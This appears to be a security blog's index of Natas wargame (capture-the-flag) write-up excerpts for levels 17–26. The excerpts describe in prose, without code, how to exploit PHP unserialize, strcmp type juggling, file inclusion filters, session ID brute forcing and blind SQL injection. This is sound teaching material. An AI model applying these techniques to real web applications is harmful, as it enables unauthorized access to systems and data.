Author: dugisec

Natas Level 26

Today we’ll be exploiting the unserialize() function in PHP.  The major lesson here is to NEVER unserialize() user input, and I’ll show you why. PHP.net describes the serialize() function as follows: “Generates a storable representation of a value.  This is useful for storing or passing PHP values around without losing

Read More »

Natas Level 25

This one is one of the most involved levels so far, as there are multiple pieces to the puzzle.  Let’s jump right in: First we can see they are making an awful lot of effort to prevent us from including arbitrary files via the $filename variable.  This is a big

Read More »

Natas Level 24

To win this level it would appear that we need to get $_REQUEST[“passwd”] to match the value of “censored”.  Maybe there is another way though.  Let’s see what the comments on php.net have to say about the strcmp() function. As it turns out !strcmp(“foo”, array()) returns “1” AKA “true”, For

Read More »

Natas Level 23

So we need to get $_REQUEST[“passwd”] to be greater than 10, AND strstr($_REQUEST[“passwd”],”iloveyou”) to evaluate to true.  Let’s examine the behavior of the PHP “>” operator: According to php.net “If you compare a number with a string or the comparison involves numerical strings, then each string is converted to a

Read More »

Natas Level 22

If you though the last level was easy, this one is even easier. Alls we have to do is set revelio=1 for the win:

Read More »

Natas Level 21

This one was really easy: Alls we have to do is set admin=1 for the win.  Let’s try: Well that didn’t work.  What’s up with this experimenter thing anyway?  I wonder what would happen if we used the PHPSESSID from that and made the same request?   Oh…that’s what happens.

Read More »

Natas Level 20

There is a lot of code in this one so lets focus in on the some of the more important parts: Line 23 tells us we need to set $_SESSION[“admin”] == 1. for the win.  We don’t have direct control over the $_SESSION array, but the following code offers an

Read More »

Natas Level 19

This is a really fabulous hint.  We know we’ll have to brute force the session ID again, and we also know the pattern is not sequential like the previous level, so lets start checking out some sample session IDs: Hmmm, all the session IDs consist of letters a-f and digits

Read More »

Natas Level 18

No matter what you log in as it says “You are logged in as a regular user. Login as an admin to retrieve credentials for natas19”. We need to get the session where $_SESSION[‘admin’] == 1, but how do we know which PHPSESSID is associated with this? Well earlier in

Read More »

Natas Level 17

Our username check is back, and this time it’s not telling us anything: It looks like they forgot to uncomment all the messages before they published this file.  That’s ok, we can take the same strategy as the other blind sql level, and use an if statement combined with the

Read More »